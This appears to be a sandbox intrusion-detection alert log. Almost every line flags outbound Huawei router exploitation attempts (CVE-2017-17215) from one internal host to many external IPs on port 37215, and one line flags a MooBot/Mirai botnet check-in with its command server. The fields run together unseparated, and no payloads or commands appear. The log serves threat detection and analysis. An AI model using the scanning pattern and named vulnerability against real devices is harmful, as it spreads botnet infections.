                                                    07/10/24-08:27:07.361334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3881237215192.168.2.14157.74.210.0
                                                    07/10/24-08:27:23.482835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5393837215192.168.2.14157.6.83.192
                                                    07/10/24-08:26:14.757846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043237215192.168.2.14197.242.190.51
                                                    07/10/24-08:27:33.946860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018037215192.168.2.14197.11.110.251
                                                    07/10/24-08:27:24.973099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422237215192.168.2.14197.154.2.100
                                                    07/10/24-08:26:25.454696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852637215192.168.2.1464.75.226.234
                                                    07/10/24-08:27:10.739922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003637215192.168.2.1441.185.219.248
                                                    07/10/24-08:26:47.926461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810037215192.168.2.1441.8.247.250
                                                    07/10/24-08:26:49.784403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4584837215192.168.2.1441.241.63.125
                                                    07/10/24-08:27:22.571545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892237215192.168.2.14144.13.202.135
                                                    07/10/24-08:26:41.500020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573837215192.168.2.14197.253.61.65
                                                    07/10/24-08:27:22.468391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360437215192.168.2.14157.254.61.130
                                                    07/10/24-08:27:07.245837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5465037215192.168.2.1441.15.239.157
                                                    07/10/24-08:27:02.991473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5843437215192.168.2.14197.12.22.120
                                                    07/10/24-08:27:14.761974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4323437215192.168.2.1441.188.234.79
                                                    07/10/24-08:27:05.109187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5111637215192.168.2.1441.233.183.46
                                                    07/10/24-08:27:20.513537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958037215192.168.2.14157.32.124.3
                                                    07/10/24-08:26:47.978865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058437215192.168.2.14183.16.93.195
                                                    07/10/24-08:26:53.140498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814437215192.168.2.1441.76.11.70
                                                    07/10/24-08:27:13.883458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5097837215192.168.2.1441.231.0.158
                                                    07/10/24-08:26:17.989941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783837215192.168.2.1470.33.66.206
                                                    07/10/24-08:26:38.603168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5610037215192.168.2.14197.133.163.102
                                                    07/10/24-08:27:32.602329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4725437215192.168.2.14157.207.97.19
                                                    07/10/24-08:26:49.827119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990837215192.168.2.1441.105.246.169
                                                    07/10/24-08:27:22.562470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507437215192.168.2.14188.90.4.189
                                                    07/10/24-08:27:22.573004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854837215192.168.2.1441.71.107.130
                                                    07/10/24-08:26:59.811678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319037215192.168.2.1441.69.66.136
                                                    07/10/24-08:26:33.217527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3494437215192.168.2.14197.216.230.193
                                                    07/10/24-08:26:13.652301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515237215192.168.2.144.45.92.173
                                                    07/10/24-08:26:59.776063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486037215192.168.2.14197.22.204.143
                                                    07/10/24-08:26:20.161676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753037215192.168.2.14192.241.120.96
                                                    07/10/24-08:26:59.754191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3303637215192.168.2.14197.82.232.245
                                                    07/10/24-08:26:49.850341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5076037215192.168.2.14157.164.10.242
                                                    07/10/24-08:27:23.924577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817037215192.168.2.1441.148.80.254
                                                    07/10/24-08:27:28.089956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426437215192.168.2.1441.210.98.239
                                                    07/10/24-08:27:14.835564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606437215192.168.2.14157.54.97.32
                                                    07/10/24-08:26:23.309785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823637215192.168.2.14157.118.176.138
                                                    07/10/24-08:27:23.921577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928037215192.168.2.14157.20.212.100
                                                    07/10/24-08:26:34.257724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816437215192.168.2.14157.97.100.157
                                                    07/10/24-08:26:41.617350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284037215192.168.2.14197.176.34.193
                                                    07/10/24-08:26:49.789175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441037215192.168.2.14157.176.17.116
                                                    07/10/24-08:26:42.393770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4421437215192.168.2.14157.65.56.156
                                                    07/10/24-08:26:55.428547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918037215192.168.2.14197.30.62.143
                                                    07/10/24-08:26:14.810948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974437215192.168.2.14197.116.214.91
                                                    07/10/24-08:26:31.046264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574837215192.168.2.14110.127.190.105
                                                    07/10/24-08:26:53.177973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4339037215192.168.2.14135.166.56.138
                                                    07/10/24-08:26:57.650013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960637215192.168.2.14197.136.67.76
                                                    07/10/24-08:27:28.108861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348037215192.168.2.14157.214.114.237
                                                    07/10/24-08:27:08.389316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346637215192.168.2.1446.158.98.79
                                                    07/10/24-08:27:17.107652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203637215192.168.2.14197.54.161.240
                                                    07/10/24-08:27:22.930500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5781837215192.168.2.1441.229.175.143
                                                    07/10/24-08:26:55.421607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105637215192.168.2.1441.202.195.255
                                                    07/10/24-08:26:57.641730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824837215192.168.2.14197.213.244.159
                                                    07/10/24-08:26:33.189850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543437215192.168.2.14157.23.12.199
                                                    07/10/24-08:26:38.584651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981837215192.168.2.1441.78.40.111
                                                    07/10/24-08:26:51.952619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150637215192.168.2.14197.204.166.66
                                                    07/10/24-08:26:22.279073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5229637215192.168.2.14197.0.24.227
                                                    07/10/24-08:27:23.904429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5338837215192.168.2.14157.206.199.98
                                                    07/10/24-08:26:36.424443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4646837215192.168.2.14157.236.100.219
                                                    07/10/24-08:26:15.795103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5448837215192.168.2.14197.206.117.234
                                                    07/10/24-08:26:55.391627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152237215192.168.2.1441.89.159.95
                                                    07/10/24-08:26:28.833295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731437215192.168.2.1441.242.188.110
                                                    07/10/24-08:26:34.208833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907237215192.168.2.14157.14.120.139
                                                    07/10/24-08:26:57.570720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474237215192.168.2.14197.121.9.224
                                                    07/10/24-08:27:22.545396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5525437215192.168.2.14157.122.138.254
                                                    07/10/24-08:27:19.302131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3888237215192.168.2.14197.252.100.209
                                                    07/10/24-08:26:36.417901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021237215192.168.2.14197.17.26.56
                                                    07/10/24-08:27:11.555900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570437215192.168.2.14102.233.251.190
                                                    07/10/24-08:27:19.282896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213437215192.168.2.1441.176.192.62
                                                    07/10/24-08:26:11.628509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239037215192.168.2.14197.138.107.31
                                                    07/10/24-08:26:25.454697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308637215192.168.2.14157.169.191.30
                                                    07/10/24-08:26:42.431726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4995237215192.168.2.1441.253.85.190
                                                    07/10/24-08:26:25.474823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544037215192.168.2.1441.203.211.30
                                                    07/10/24-08:26:33.210665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5906637215192.168.2.14157.252.136.176
                                                    07/10/24-08:27:08.429606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729037215192.168.2.14190.184.159.194
                                                    07/10/24-08:27:14.761974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965237215192.168.2.14157.182.64.112
                                                    07/10/24-08:26:17.996817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4456637215192.168.2.1453.80.233.113
                                                    07/10/24-08:26:49.798309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082037215192.168.2.1441.126.163.191
                                                    07/10/24-08:27:08.367822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188037215192.168.2.14197.37.136.180
                                                    07/10/24-08:27:28.049112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068037215192.168.2.1420.18.198.152
                                                    07/10/24-08:26:15.863790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403637215192.168.2.1414.218.177.51
                                                    07/10/24-08:26:28.761940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741037215192.168.2.14157.18.26.90
                                                    07/10/24-08:26:20.143490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714437215192.168.2.14142.99.86.213
                                                    07/10/24-08:27:13.905585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822037215192.168.2.14197.249.240.218
                                                    07/10/24-08:26:36.323441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015037215192.168.2.1441.245.163.103
                                                    07/10/24-08:26:31.072676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915237215192.168.2.1441.26.127.165
                                                    07/10/24-08:27:13.880072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3645037215192.168.2.1441.183.150.16
                                                    07/10/24-08:26:43.929800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6081837215192.168.2.14197.97.29.109
                                                    07/10/24-08:27:28.100122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727437215192.168.2.14197.189.64.191
                                                    07/10/24-08:26:13.657783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777437215192.168.2.14197.21.88.223
                                                    07/10/24-08:26:15.809769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3790837215192.168.2.1441.232.17.122
                                                    07/10/24-08:26:31.069487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264237215192.168.2.14197.71.87.248
                                                    07/10/24-08:26:36.403967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426237215192.168.2.14133.30.140.218
                                                    07/10/24-08:26:55.447518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813837215192.168.2.1441.157.141.228
                                                    07/10/24-08:26:25.477490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499637215192.168.2.14197.78.127.194
                                                    07/10/24-08:26:57.649894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854437215192.168.2.14147.135.178.184
                                                    07/10/24-08:26:59.785283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383437215192.168.2.14157.24.165.32
                                                    07/10/24-08:27:14.017469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512437215192.168.2.1441.164.87.41
                                                    07/10/24-08:27:05.114349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4618437215192.168.2.14157.151.92.248
                                                    07/10/24-08:26:49.827119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870237215192.168.2.14157.3.39.64
                                                    07/10/24-08:26:42.161907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3589037215192.168.2.14157.179.222.8
                                                    07/10/24-08:26:45.604198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239437215192.168.2.1441.12.183.49
                                                    07/10/24-08:26:33.171112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636837215192.168.2.14178.132.222.154
                                                    07/10/24-08:27:14.803145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360637215192.168.2.14157.162.191.79
                                                    07/10/24-08:27:20.405672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4601237215192.168.2.1441.147.242.163
                                                    07/10/24-08:26:55.458086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041637215192.168.2.1441.225.45.27
                                                    07/10/24-08:26:38.615907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830637215192.168.2.14197.236.1.222
                                                    07/10/24-08:26:11.506758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132037215192.168.2.1441.149.109.197
                                                    07/10/24-08:26:11.524637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178837215192.168.2.14157.119.94.143
                                                    07/10/24-08:27:23.818099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567037215192.168.2.14197.173.209.242
                                                    07/10/24-08:27:08.397660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664837215192.168.2.1441.87.123.199
                                                    07/10/24-08:27:28.173873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980837215192.168.2.1441.29.120.224
                                                    07/10/24-08:26:41.571728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346637215192.168.2.14157.219.189.191
                                                    07/10/24-08:26:57.580617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132637215192.168.2.1441.211.85.54
                                                    07/10/24-08:27:23.937320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760037215192.168.2.14197.25.112.1
                                                    07/10/24-08:27:22.571797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3949637215192.168.2.1441.21.98.109
                                                    07/10/24-08:26:15.833755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626437215192.168.2.1431.57.150.66
                                                    07/10/24-08:27:10.631590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207237215192.168.2.1441.138.105.118
                                                    07/10/24-08:26:18.011298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857037215192.168.2.1441.25.80.59
                                                    07/10/24-08:26:25.505389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720637215192.168.2.14157.10.139.198
                                                    07/10/24-08:26:48.031000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525037215192.168.2.1441.98.40.178
                                                    07/10/24-08:27:33.897837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433037215192.168.2.14157.183.214.218
                                                    07/10/24-08:27:07.268658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3791037215192.168.2.14197.24.84.41
                                                    07/10/24-08:26:43.785439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392637215192.168.2.14197.105.114.85
                                                    07/10/24-08:26:22.301370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267037215192.168.2.14165.161.133.25
                                                    07/10/24-08:27:28.174408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784837215192.168.2.14157.39.25.112
                                                    07/10/24-08:26:43.820800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740637215192.168.2.14197.97.219.135
                                                    07/10/24-08:26:11.659396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3425837215192.168.2.14157.174.22.12
                                                    07/10/24-08:27:10.654504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875837215192.168.2.1441.17.201.65
                                                    07/10/24-08:27:13.978564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600237215192.168.2.14157.241.12.147
                                                    07/10/24-08:26:52.069901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416237215192.168.2.14197.115.158.233
                                                    07/10/24-08:27:10.767328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5830637215192.168.2.14197.44.200.184
                                                    07/10/24-08:26:20.098381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750837215192.168.2.14157.69.224.201
                                                    07/10/24-08:26:20.188191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206637215192.168.2.14157.98.164.52
                                                    07/10/24-08:26:28.875579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5951237215192.168.2.1466.168.140.88
                                                    07/10/24-08:26:57.520165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683237215192.168.2.14157.91.26.213
                                                    07/10/24-08:26:41.479752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789837215192.168.2.14157.105.187.107
                                                    07/10/24-08:27:27.047085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826637215192.168.2.1441.246.40.115
                                                    07/10/24-08:26:14.626418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933237215192.168.2.1441.11.123.229
                                                    07/10/24-08:26:31.081032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911837215192.168.2.1441.248.100.195
                                                    07/10/24-08:26:11.116364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327837215192.168.2.1441.195.22.236
                                                    07/10/24-08:26:36.381629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605237215192.168.2.14197.219.230.95
                                                    07/10/24-08:26:25.423394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164637215192.168.2.14157.44.184.157
                                                    07/10/24-08:27:33.854360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110837215192.168.2.14157.145.112.157
                                                    07/10/24-08:26:13.829838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164637215192.168.2.1441.165.144.112
                                                    07/10/24-08:26:17.937517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806437215192.168.2.14157.48.7.155
                                                    07/10/24-08:27:33.947643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801637215192.168.2.14157.187.118.98
                                                    07/10/24-08:26:11.176573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4623837215192.168.2.14197.45.163.77
                                                    07/10/24-08:27:32.538525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740237215192.168.2.1441.139.107.77
                                                    07/10/24-08:26:43.910396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345037215192.168.2.14101.145.151.121
                                                    07/10/24-08:26:15.881754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828637215192.168.2.14157.65.4.126
                                                    07/10/24-08:26:55.289517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455837215192.168.2.14187.139.183.17
                                                    07/10/24-08:27:22.903697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674237215192.168.2.1471.145.137.220
                                                    07/10/24-08:27:20.417090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239037215192.168.2.14197.147.158.219
                                                    07/10/24-08:26:29.887676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282037215192.168.2.14194.109.20.119
                                                    07/10/24-08:26:34.223622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068837215192.168.2.14197.51.68.8
                                                    07/10/24-08:26:17.972432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021837215192.168.2.14157.201.197.77
                                                    07/10/24-08:27:07.286969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011037215192.168.2.1441.197.150.0
                                                    07/10/24-08:26:11.115720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4561637215192.168.2.1441.197.151.231
                                                    07/10/24-08:27:02.933284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5760637215192.168.2.1441.0.227.242
                                                    07/10/24-08:26:13.657783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253437215192.168.2.14197.133.173.153
                                                    07/10/24-08:27:32.593829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596037215192.168.2.14157.102.168.120
                                                    07/10/24-08:27:33.764696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842237215192.168.2.14197.201.159.166
                                                    07/10/24-08:26:13.671572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017437215192.168.2.14157.132.219.156
                                                    07/10/24-08:27:14.074781TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)334005976192.168.2.1451.79.141.54
                                                    07/10/24-08:26:22.256237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631837215192.168.2.1477.174.63.77
                                                    07/10/24-08:27:05.081710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207237215192.168.2.14197.79.254.39
                                                    07/10/24-08:26:22.259502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600437215192.168.2.14197.139.183.85
                                                    07/10/24-08:26:14.804457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545437215192.168.2.14166.242.146.25
                                                    07/10/24-08:27:05.163541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542837215192.168.2.14157.66.52.0
                                                    07/10/24-08:26:25.520266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475437215192.168.2.14197.240.153.238
                                                    07/10/24-08:26:34.223623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505837215192.168.2.14157.94.7.26
                                                    07/10/24-08:26:28.850354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169437215192.168.2.14197.73.99.69
                                                    07/10/24-08:26:55.462338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4711837215192.168.2.1441.153.76.146
                                                    07/10/24-08:26:31.065728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398437215192.168.2.14157.31.76.8
                                                    07/10/24-08:27:28.115496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744837215192.168.2.14171.102.182.78
                                                    07/10/24-08:26:43.537786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863237215192.168.2.1441.109.210.60
                                                    07/10/24-08:27:08.323465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361437215192.168.2.1427.197.152.46
                                                    07/10/24-08:26:59.814735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4399437215192.168.2.14157.162.230.160
                                                    07/10/24-08:27:13.960934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386037215192.168.2.1445.127.154.81
                                                    07/10/24-08:26:26.441172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426437215192.168.2.14157.57.139.119
                                                    07/10/24-08:27:08.398717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285837215192.168.2.1441.167.173.158
                                                    07/10/24-08:27:13.844638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101837215192.168.2.14197.151.229.194
                                                    07/10/24-08:26:13.754443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743837215192.168.2.1441.240.232.222
                                                    07/10/24-08:27:23.949605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5621637215192.168.2.14197.34.79.15
                                                    07/10/24-08:26:36.439242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4967237215192.168.2.14173.232.186.142
